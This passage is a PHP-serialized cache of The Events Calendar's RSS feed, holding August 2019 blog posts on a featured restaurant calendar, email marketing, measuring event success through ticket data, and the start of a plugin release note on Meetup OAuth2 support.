\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";s:5:\\\"child\\\";a:3:{s:0:\\\"\\\";a:6:{s:5:\\\"title\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:35:\\\"Featured Calendar: Ginger and Baker\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"link\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:65:\\\"https://theeventscalendar.com/featured-calendar-ginger-and-baker/\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:7:\\\"pubDate\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:31:\\\"Mon, 19 Aug 2019 18:12:32 +0000\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:8:\\\"category\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:8:\\\"Articles\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"guid\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:40:\\\"https://theeventscalendar.com/?p=1851078\\\";s:7:\\\"attribs\\\";a:1:{s:0:\\\"\\\";a:1:{s:11:\\\"isPermaLink\\\";s:5:\\\"false\\\";}}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:11:\\\"description\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:588:\\\"<p>Ginger and Baker is not your typical restaurant. Or cafe. Or kitchen. Or bakery. It&#8217;s all of those packed together in an historic building just north of Downtown Fort Collins in Colorado that owner Ginger Graham remodeled into the operation it is today. With so much activity, Ginger and Baker relies on an online calendar&#8230;</p>\\n<p>The post <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com/featured-calendar-ginger-and-baker/\\\">Featured Calendar: Ginger and Baker</a> appeared first on <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com\\\">The Events Calendar</a>.</p>\\n\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}s:32:\\\"http://purl.org/dc/elements/1.1/\\\";a:1:{s:7:\\\"creator\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:5:\\\"Geoff\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}s:40:\\\"http://purl.org/rss/1.0/modules/content/\\\";a:1:{s:7:\\\"encoded\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:4776:\\\"<p>Ginger and Baker is not your typical restaurant. Or cafe. Or kitchen. Or bakery. It&#8217;s all of those packed together in an historic building just north of Downtown Fort Collins in Colorado that owner Ginger Graham remodeled into the operation it is today.</p>\\n<p>With so much activity, Ginger and Baker relies on an online calendar of events both to promote happenings and help visualize everything. We&#8217;re talking about weddings, cooking classes, corporate meetings&#8230; the works!</p>\\n<p><a href=\\\"https://gingerandbaker.com\\\">The Ginger and Baker website</a> is built in WordPress and, as such, they have turned to <a href=\\\"https://theeventscalendar.com/product/wordpress-events-calendar/\\\">The Events Calendar</a> as their platform for highlighting and showcasing events. No arguments from us over here on our team! <img src=\\\"https://s.w.org/images/core/emoji/12.0.0-1/72x72/1f603.png\\\" alt=\\\"?\\\" class=\\\"wp-smiley\\\" style=\\\"height: 1em; max-height: 1em;\\\" /></p>\\n<p><img src=\\\"https://s3.theeventscalendar.com/uploads/2019/08/ginger-01.png\\\" alt=\\\"\\\" width=\\\"987\\\" height=\\\"800\\\" class=\\\"alignnone size-full wp-image-1851131\\\" srcset=\\\"https://s3.theeventscalendar.com/uploads/2019/08/ginger-01.png 987w, https://s3.theeventscalendar.com/uploads/2019/08/ginger-01-105x85.png 105w, https://s3.theeventscalendar.com/uploads/2019/08/ginger-01-300x243.png 300w, https://s3.theeventscalendar.com/uploads/2019/08/ginger-01-768x622.png 768w, https://s3.theeventscalendar.com/uploads/2019/08/ginger-01-665x539.png 665w, https://s3.theeventscalendar.com/uploads/2019/08/ginger-01-430x349.png 430w, https://s3.theeventscalendar.com/uploads/2019/08/ginger-01-645x523.png 645w, https://s3.theeventscalendar.com/uploads/2019/08/ginger-01-460x373.png 460w, https://s3.theeventscalendar.com/uploads/2019/08/ginger-01-600x486.png 600w, https://s3.theeventscalendar.com/uploads/2019/08/ginger-01-500x405.png 500w\\\" sizes=\\\"(max-width: 987px) 100vw, 987px\\\" /></p>\\n<p>What makes <a href=\\\"https://gingerandbaker.com/the-teaching-kitchen/\\\">the calendar</a> so nice is the way it seamlessly integrates with the overall design of the site. It uses a bold red as the primary color, implements custom fonts, and removes a lot of the extra affordances (e.g. search and other calendar views) to maintain the stark, minimal look and feel that is echoed thoughout the site.</p>\\n<p><img src=\\\"https://s3.theeventscalendar.com/uploads/2019/08/ginger-02.png\\\" alt=\\\"\\\" width=\\\"987\\\" height=\\\"690\\\" class=\\\"alignnone size-full wp-image-1851088\\\" srcset=\\\"https://s3.theeventscalendar.com/uploads/2019/08/ginger-02.png 987w, https://s3.theeventscalendar.com/uploads/2019/08/ginger-02-122x85.png 122w, https://s3.theeventscalendar.com/uploads/2019/08/ginger-02-300x210.png 300w, https://s3.theeventscalendar.com/uploads/2019/08/ginger-02-768x537.png 768w, https://s3.theeventscalendar.com/uploads/2019/08/ginger-02-665x465.png 665w, https://s3.theeventscalendar.com/uploads/2019/08/ginger-02-430x301.png 430w, https://s3.theeventscalendar.com/uploads/2019/08/ginger-02-645x451.png 645w, https://s3.theeventscalendar.com/uploads/2019/08/ginger-02-460x322.png 460w, https://s3.theeventscalendar.com/uploads/2019/08/ginger-02-600x419.png 600w, https://s3.theeventscalendar.com/uploads/2019/08/ginger-02-500x350.png 500w\\\" sizes=\\\"(max-width: 987px) 100vw, 987px\\\" /></p>\\n<p>What can you learn from Ginger and Baker&#8217;s calendar? Well, first off, it&#8217;s a perfect example of just how flexible The Events Calendar is. Sure, installing the calendar is as simple as a single click to activate the plugin. But that&#8217;s just like going to Disneyland riding the tram into the park and calling it a day. What Ginger and Baker have done is maximized the already powerful features included in the plugin and put them to use in <a href=\\\"https://support.theeventscalendar.com/451403-The-Events-Calendar-and-the-WordPress-Customizer\\\">the plugin&#8217;s comprehensive settings</a>. They&#8217;ve also taken advantage of The Events Calendar&#8217;s <a href=\\\"https://support.theeventscalendar.com/153124-Themers-Guide\\\">template overrides</a> to customize the overall looks and feels consistent with the rest of the site.</p>\\n<p>Another takeaway? Getting this same sort of calendar can cost as little as zilch. Everything you see comes baked right into The Events Calendar, which is <a href=\\\"https://wordpress.org/plugins/the-events-calendar/\\\">freely available in the WordPress plugin directory</a>. Simply install, activate, and start customizing&mdash;it&#8217;s really that simple.</p>\\n<p>The post <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com/featured-calendar-ginger-and-baker/\\\">Featured Calendar: Ginger and Baker</a> appeared first on <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com\\\">The Events Calendar</a>.</p>\\n\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}}}i:3;a:6:{s:4:\\\"data\\\";s:48:\\\"\\n		\\n		\\n				\\n		\\n				\\n\\n		\\n				\\n								\\n										\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";s:5:\\\"child\\\";a:3:{s:0:\\\"\\\";a:6:{s:5:\\\"title\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:63:\\\"Why Email Should Still Be a Part of Your Marketing Plan in 2019\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"link\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:94:\\\"https://theeventscalendar.com/why-email-should-still-be-a-part-of-your-marketing-plan-in-2019/\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:7:\\\"pubDate\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:31:\\\"Wed, 14 Aug 2019 15:38:44 +0000\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:8:\\\"category\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:8:\\\"Articles\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"guid\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:40:\\\"https://theeventscalendar.com/?p=1842085\\\";s:7:\\\"attribs\\\";a:1:{s:0:\\\"\\\";a:1:{s:11:\\\"isPermaLink\\\";s:5:\\\"false\\\";}}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:11:\\\"description\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:655:\\\"<p>Let’s play two truths and a lie:  Nobody reads emails anymore.  Everything gets lost in the Promotions tab anyway.  Email marketing is dead. If you picked one, or two, or three… you’d be wrong. All three are lies. (We’re tricky like that sometimes.)  But you’d be forgiven for questioning whether email still deserves a spot&#8230;</p>\\n<p>The post <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com/why-email-should-still-be-a-part-of-your-marketing-plan-in-2019/\\\">Why Email Should Still Be a Part of Your Marketing Plan in 2019</a> appeared first on <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com\\\">The Events Calendar</a>.</p>\\n\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}s:32:\\\"http://purl.org/dc/elements/1.1/\\\";a:1:{s:7:\\\"creator\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:6:\\\"Lauren\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}s:40:\\\"http://purl.org/rss/1.0/modules/content/\\\";a:1:{s:7:\\\"encoded\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:6648:\\\"<p><span style=\\\"font-weight: 400;\\\">Let’s play two truths and a lie: </span></p>\\n<ol>\\n<li style=\\\"font-weight: 400;\\\"><span style=\\\"font-weight: 400;\\\">Nobody reads emails anymore. </span></li>\\n<li style=\\\"font-weight: 400;\\\"><span style=\\\"font-weight: 400;\\\">Everything gets lost in the Promotions tab anyway. </span></li>\\n<li style=\\\"font-weight: 400;\\\"><span style=\\\"font-weight: 400;\\\">Email marketing is dead.</span></li>\\n</ol>\\n<p><span style=\\\"font-weight: 400;\\\">If you picked one, or two, or three… you’d be wrong. All three are lies. (We’re tricky like that sometimes.) </span></p>\\n<p><span style=\\\"font-weight: 400;\\\">But you’d be forgiven for questioning whether email still deserves a spot in your 2019 event marketing strategy. With so many new ad types that have emerged across social media and search engines, it’s a fair question: Should you even bother with email anymore for promoting your events? </span></p>\\n<p><span style=\\\"font-weight: 400;\\\">The short answer: Yes. The long answer: Yes, and here are four</span> <span style=\\\"font-weight: 400;\\\">reasons why:</span></p>\\n<p>&nbsp;</p>\\n<h3><b>Email is still one of the best mediums for serving up personalized content.</b></h3>\\n<p>&nbsp;</p>\\n<p><span style=\\\"font-weight: 400;\\\">All signs point to </span><a href=\\\"https://www.forbes.com/sites/forbescommunicationscouncil/2019/01/14/three-predictions-for-email-marketing-in-2019/#67ccda591533\\\"><span style=\\\"font-weight: 400;\\\">personalization as a priority for marketers in 2019</span></a><span style=\\\"font-weight: 400;\\\">, and email is still one of the best tools for cultivating personal connections. By segmenting your email contacts, you can customize your communications so that you’re sending tailored messages to attendees or customers with specific interests. </span></p>\\n<p><span style=\\\"font-weight: 400;\\\">Sure, social media advertising might let you create an audience with certain demographic qualities, but your email contacts are even more valuable—they’re people who have already interacted with your brand or your events, and you can sort your master list based on who has attended past events, which events people attended, and other variables that are derived from real-life data rather than speculation or broad targeting parameters. </span></p>\\n<p>&nbsp;</p>\\n<h3><b>E-newsletters are making a comeback.</b></h3>\\n<p>&nbsp;</p>\\n<p><span style=\\\"font-weight: 400;\\\">Don’t be too quick to write off email newsletters, especially if you’re promoting events to a niche audience. Over the past few years, we’ve seen the rise of </span><a href=\\\"https://www.skyword.com/contentstandard/marketing/the-rise-of-the-journalistic-email-newsletter-a-new-way-to-reach-your-niche-audience/\\\"><span style=\\\"font-weight: 400;\\\">journalistic email newsletters</span></a><span style=\\\"font-weight: 400;\\\">, and the popularity of these niche newsletters bodes well; it shows that people are craving high-quality content in their inboxes.</span></p>\\n<p><span style=\\\"font-weight: 400;\\\">Plus, unlike one-off email marketing campaigns, an ongoing newsletter is a powerful tool for building relationships with your audience and keeping your brand at the forefront of people’s minds, according to </span><a href=\\\"https://www.salesforce.com/ca/blog/2016/08/email-newsletters.html\\\"><span style=\\\"font-weight: 400;\\\">Salesforce</span></a><span style=\\\"font-weight: 400;\\\">.</span></p>\\n<p>&nbsp;</p>\\n<h3><b>Email is accessible for small business owners and entrepreneurs.</b></h3>\\n<p>&nbsp;</p>\\n<p><span style=\\\"font-weight: 400;\\\">If you’re a business owner on a budget, email marketing offers a pretty unbeatable bang for the buck. As </span><a href=\\\"https://www.wordstream.com/blog/ws/2014/11/12/is-email-marketing-effective\\\"><span style=\\\"font-weight: 400;\\\">WordStream</span></a><span style=\\\"font-weight: 400;\\\"> points out, even the smallest and most nimble companies can run successful promotions and campaigns via email without bringing on a dedicated marketing team (or even a single dedicated marketing employee).</span></p>\\n<p><span style=\\\"font-weight: 400;\\\">It also doesn’t take a lot of legwork to hit the ground running with email marketing. Tools like </span><a href=\\\"https://theeventscalendar.com/product/promoter/\\\"><span style=\\\"font-weight: 400;\\\">Promoter</span></a><span style=\\\"font-weight: 400;\\\"> (shameless plug!) integrate seamlessly with your events calendar, allowing you to connect with your community via email through every stage of your event. Sit back and take advantage of automated touchpoints that help you announce new events, remind people to register, or check in with attendees after an event. With Promoter, you can run a robust DIY email marketing campaign without tons of overhead.</span></p>\\n<p>&nbsp;</p>\\n<h3><b>Email results and ROI are easy to track.</b></h3>\\n<p>&nbsp;</p>\\n<p><span style=\\\"font-weight: 400;\\\">Anyone in the marketing biz knows how hard it can be to demonstrate return on investment for some efforts—it’s darn near impossible to put a price tag on “awareness,” for example. If you’re responsible for reporting on real, tangible marketing results, email is your friend. It’s super trackable, allowing you to keep an eye on performance in the form of email open rates, click-through rates, and conversions. </span></p>\\n<p><span style=\\\"font-weight: 400;\\\">Plus, email is the perfect playground for marketers. Without any heavy lifting, you can easily run A/B tests to see which subject lines perform best and which calls to action generate the best click-through rates and conversions.</span></p>\\n<h3><b>Say “I Do” to Email in 2019</b></h3>\\n<p><span style=\\\"font-weight: 400;\\\">If email marketing has taken a back seat in your event promotions strategy lately, we get it—it’s hard to keep up with all the different tools available these days for promoting your events. </span></p>\\n<p><span style=\\\"font-weight: 400;\\\">But this year, make it a priority to get back to basics and level up your email marketing techniques. Whether you decide to launch a niche newsletter or you just need a tool like </span><a href=\\\"https://theeventscalendar.com/product/promoter/\\\"><span style=\\\"font-weight: 400;\\\">Promoter</span></a><span style=\\\"font-weight: 400;\\\"> to help bolster registration numbers and ticket sales, email is an OG tool with modern-day benefits for marketers.</span></p>\\n<p>The post <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com/why-email-should-still-be-a-part-of-your-marketing-plan-in-2019/\\\">Why Email Should Still Be a Part of Your Marketing Plan in 2019</a> appeared first on <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com\\\">The Events Calendar</a>.</p>\\n\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}}}i:4;a:6:{s:4:\\\"data\\\";s:51:\\\"\\n		\\n		\\n				\\n		\\n				\\n		\\n\\n		\\n				\\n								\\n										\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";s:5:\\\"child\\\";a:3:{s:0:\\\"\\\";a:6:{s:5:\\\"title\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:48:\\\"How to Use Your Event Tickets to Measure Success\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"link\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:79:\\\"https://theeventscalendar.com/how-to-use-your-event-tickets-to-measure-success/\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:7:\\\"pubDate\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:31:\\\"Mon, 12 Aug 2019 15:00:51 +0000\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:8:\\\"category\\\";a:2:{i:0;a:5:{s:4:\\\"data\\\";s:8:\\\"Articles\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}i:1;a:5:{s:4:\\\"data\\\";s:9:\\\"ticketing\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"guid\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:40:\\\"https://theeventscalendar.com/?p=1847672\\\";s:7:\\\"attribs\\\";a:1:{s:0:\\\"\\\";a:1:{s:11:\\\"isPermaLink\\\";s:5:\\\"false\\\";}}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:11:\\\"description\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:609:\\\"<p>Event planners are on a never-ending quest to measure the success of their events, and for good reason. Event metrics and analytics help us understand why some events are a hit and why others fly under the radar. While there are countless metrics you can analyze to evaluate your events, there’s one indicator of success&#8230;</p>\\n<p>The post <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com/how-to-use-your-event-tickets-to-measure-success/\\\">How to Use Your Event Tickets to Measure Success</a> appeared first on <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com\\\">The Events Calendar</a>.</p>\\n\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}s:32:\\\"http://purl.org/dc/elements/1.1/\\\";a:1:{s:7:\\\"creator\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:6:\\\"Lauren\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}s:40:\\\"http://purl.org/rss/1.0/modules/content/\\\";a:1:{s:7:\\\"encoded\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:5124:\\\"<p>Event planners are on a never-ending quest to <a href=\\\"https://theeventscalendar.com/event-metrics-calculations-measuring-event-success/\\\">measure the success of their events</a>, and for good reason. <a href=\\\"https://theeventscalendar.com/wordpress-analytics-measure-marketing-success/\\\">Event metrics and analytics</a> help us understand why some events are a hit and why others fly under the radar. While there are countless metrics you can analyze to evaluate your events, there’s one indicator of success that you do *not* want to sleep on—and that’s the data from your event ticket sales.</p>\\n<p>Tickets serve an important practical purpose, of course. But aside from getting people through the door of your event, ticketing also captures boatloads of valuable information. By taking the time to look at the nitty gritty of your ticket sales data, you’ll get an up-close view of your attendees’ interests, preferences, and habits.</p>\\n<p>Every event planner should look at ticket data when evaluating event success. But the way you go about it will depend on your business and your goals.</p>\\n<h3>Start by determining what success looks like for your business</h3>\\n<p>Think about the big picture: If you had to pinpoint your number one goal or the main reason you’re in the events biz, what would it be? Is it to generate profit and sales? To host events that attract a big audience? To build a community? </p>\\n<p>Decide what success looks like for you, and keep your ultimate goal top-of-mind as you make important decisions about event logistics, promotion, and programming. Frequently revisiting your goal will help you stay on track throughout the event lifecycle as you make decisions starting with planning and promotion, all the way through to the post-event evaluation period.</p>\\n<h3>It’s time to dig into the ticket data</h3>\\n<p>Chances are, you already keep tabs on your overall ticket sales and revenue. That’s an important metric, but it’s only one piece of the picture. Don’t forget about the other information you can glean from your event tickets:</p>\\n<ul>\\n<li><strong>Ticket sales can tell you how attendees feel about the venue.</strong> If you’re hosting events at a <a href=\\\"https://support.theeventscalendar.com/780934-Ticketing-using-a-seating-chart\\\">venue with limited or assigned seating</a>, look at which sections are most popular, and which sections are wide open—you’ll quickly get a sense for whether your <a href=\\\"https://theeventscalendar.com/venue-marketing-promote-events-sell-tickets/\\\">venue</a> is too big, too small, or if it just isn’t suited to your specific event. You can also compare ticket sales for similar events hosted at different venues, to compare if one venue attracts larger crowds than another.</li>\\n<li><strong>Compare ticket sales across types or tiers.</strong> If you routinely sell out your general admission tickets but you can’t sell an expensive <abbr>VIP</abbr> ticket to save your life, listen to the data: Either your <abbr>VIP</abbr> tickets are too pricey, or the perks aren’t enticing enough for your attendees to justify the higher cost. Use this information to adjust ticket prices and ticket tiers in order to give your audience more of what they want and to ultimately sell more tickets. Alternatively, if your business goal is more about drawing a crowd than turning a profit, consider selling more <abbr title=\\\"General Admission\\\">GA</abbr> tickets and fewer <abbr>VIP</abbr> passes.</li>\\n<li><strong>Your ticket data can provide additional information about attendees.</strong> With the help of a tool like <a href=\\\"https://theeventscalendar.com/product/wordpress-event-tickets-plus/\\\">Event Tickets Plus</a>, you can gather valuable information from people who RSVP or buy tickets to your events. Add <a href=\\\"https://support.theeventscalendar.com/314750-Collecting-Attendee-Information\\\">custom fields</a> to your registration form, with the option to make some fields required. In some cases, you may use custom fields for purely practical reasons—T-shirt size or meal preference, for instance—but you can also ask questions like “how did you hear about this event?”, “what are you most excited for?”, or “what’s your top priority when registering for an event”? By asking questions that tie back to your goals and your reason for hosting the event, you’ll come away with attendee feedback that can help steer your event strategy going forward.</li>\\n</ul>\\n<p>Ready to get started? If you’re in need of a WordPress ticketing tool that lets you take control of your ticket sales, we’ve got your back with plugins like <a href=\\\"https://theeventscalendar.com/product/wordpress-event-tickets/\\\">Event Tickets</a> and <a href=\\\"https://theeventscalendar.com/product/wordpress-event-tickets-plus/\\\">Event Tickets Plus</a>.</p>\\n<p>The post <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com/how-to-use-your-event-tickets-to-measure-success/\\\">How to Use Your Event Tickets to Measure Success</a> appeared first on <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com\\\">The Events Calendar</a>.</p>\\n\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}}}i:5;a:6:{s:4:\\\"data\\\";s:48:\\\"\\n		\\n		\\n				\\n		\\n				\\n\\n		\\n				\\n								\\n										\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";s:5:\\\"child\\\";a:3:{s:0:\\\"\\\";a:6:{s:5:\\\"title\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:36:\\\"Announcing The Events Calendar 4.9.6\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"link\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:67:\\\"https://theeventscalendar.com/announcing-the-events-calendar-4-9-6/\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:7:\\\"pubDate\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:31:\\\"Thu, 08 Aug 2019 17:13:56 +0000\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:8:\\\"category\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:13:\\\"Release Notes\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"guid\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:40:\\\"https://theeventscalendar.com/?p=1850951\\\";s:7:\\\"attribs\\\";a:1:{s:0:\\\"\\\";a:1:{s:11:\\\"isPermaLink\\\";s:5:\\\"false\\\";}}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:11:\\\"description\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:619:\\\"<p>We are excited to announce that we just shipped a maintenance release for The Events Calendar! This release features Event Aggregator support for Meetup&#8217;s new authentiacation protocol, which involves a switch from API keys to OAuth2. What does this mean for you? After updating, you will need to reconnect to Meetup under Events &#62; Settings &#62;&#8230;</p>\\n<p>The post <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com/announcing-the-events-calendar-4-9-6/\\\">Announcing The Events Calendar 4.9.6</a> appeared first on <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com\\\">The Events Calendar</a>.</p>\\n\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}s:32:\\\"http://purl.org/dc/elements/1.1/\\\";a:1:{s:7:\\\"creator\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:8:\\\"Jennifer\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}s:40:\\\"http://purl.org/rss/1.0/modules/content/\\\";a:1:{s:7:\\\"encoded\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:2857:\\\"<p>We are excited to announce that we just shipped a maintenance release for <strong>The Events Calendar</strong>! This release features <a href=\\\"https://theeventscalendar.com/product/event-aggregator/\\\">Event Aggregator</a> support for Meetup&#8217;s new authentiacation protocol, which involves a switch from API keys to <a href=\\\"https://oauth.net/2/\\\">OAuth2</a>.</p>\\n<p>What does this mean for you? After updating, you will need to reconnect to Meetup under <strong>Events</strong> &gt; <strong>Settings</strong> &gt; <strong>APIs</strong> or from the event import screen. That is all!</p>\\n<p><strong>To avoid any disruptions in service, we recommend updating to OAuth as soon as possible.</strong></p>\\n<ul>\\n<li><a href=\\\"#tec\\\">The Events Calendar 